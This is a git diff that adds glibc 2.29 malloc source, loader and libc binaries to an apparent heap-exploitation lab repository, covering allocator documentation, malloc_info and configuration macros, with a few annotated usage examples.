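+ */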
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM.
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+         *ptr = 0;
+      }
+   }
+
+ */
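+
+/*
+   Illustrative sketch (editor's example, not from the original sources):
+   as noted above, the simplest conforming MORECORE replacement is one
+   that always fails, which forces all system allocation through mmap.
+
+     static void *
+     fail_morecore (ptrdiff_t increment)
+     {
+       return (void *) MORECORE_FAILURE;
+     }
+
+   used together with
+
+     #define MORECORE fail_morecore
+     #define MORECORE_CONTIGUOUS 0
+ */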
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
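+
+/*
+   Illustrative usage sketch (editor's example, not from the original
+   sources): the alignment passed to posix_memalign must be a power-of-two
+   multiple of sizeof (void *), otherwise EINVAL is returned as above.
+
+     #include <stdlib.h>
+
+     void *buf = NULL;
+     if (posix_memalign (&buf, 64, 4096) == 0)
+       {
+         // buf is 64-byte aligned and at least 4096 bytes long
+         free (buf);
+       }
+ */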
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
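+
+/*
+   Illustrative usage sketch (editor's example, not from the original
+   sources): the XML report built above is written to a stdio stream;
+   options must currently be 0.
+
+     #include <malloc.h>
+     #include <stdio.h>
+
+     malloc_info (0, stdout);
+ */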
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.29_no-tcache/ld-2.29.so b/HeapLAB/.glibc/glibc_2.29_no-tcache/ld-2.29.so
new file mode 100755
index 0000000..412025e
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.29_no-tcache/ld-2.29.so differ
diff --git a/HeapLAB/.glibc/glibc_2.29_no-tcache/ld.so.2 b/HeapLAB/.glibc/glibc_2.29_no-tcache/ld.so.2
new file mode 120000
index 0000000..1b67396
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.29_no-tcache/ld.so.2
@@ -0,0 +1 @@
+ld-2.29.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.29_no-tcache/libc-2.29.so b/HeapLAB/.glibc/glibc_2.29_no-tcache/libc-2.29.so
new file mode 100755
index 0000000..cd7292a
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.29_no-tcache/libc-2.29.so differ
diff --git a/HeapLAB/.glibc/glibc_2.29_no-tcache/libc.so.6 b/HeapLAB/.glibc/glibc_2.29_no-tcache/libc.so.6
new file mode 120000
index 0000000..89bb464
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.29_no-tcache/libc.so.6
@@ -0,0 +1 @@
+libc-2.29.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.29_no-tcache/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.29_no-tcache/malloc/malloc.c
new file mode 100644
index 0000000..feaf7ee
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.29_no-tcache/malloc/malloc.c
@@ -0,0 +1,5609 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2019 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8-byte alignment with 4-byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification.
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+#endif
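+
+/* Worked example (editorial illustration, assuming a 64-bit build with
+   SIZE_SZ == 8, MALLOC_ALIGNMENT == 16 and MINSIZE == 32):
+     tidx2usize (0)  == 0 * 16 + 32 - 8      == 24   -> idx 0 covers 0..24
+     tidx2usize (1)  == 1 * 16 + 32 - 8      == 40   -> idx 1 covers 25..40
+     csize2tidx (32) == (32 - 32 + 15) / 16  == 0
+     csize2tidx (48) == (48 - 32 + 15) / 16  == 1
+   which matches the bin table in the comment above.  */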
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
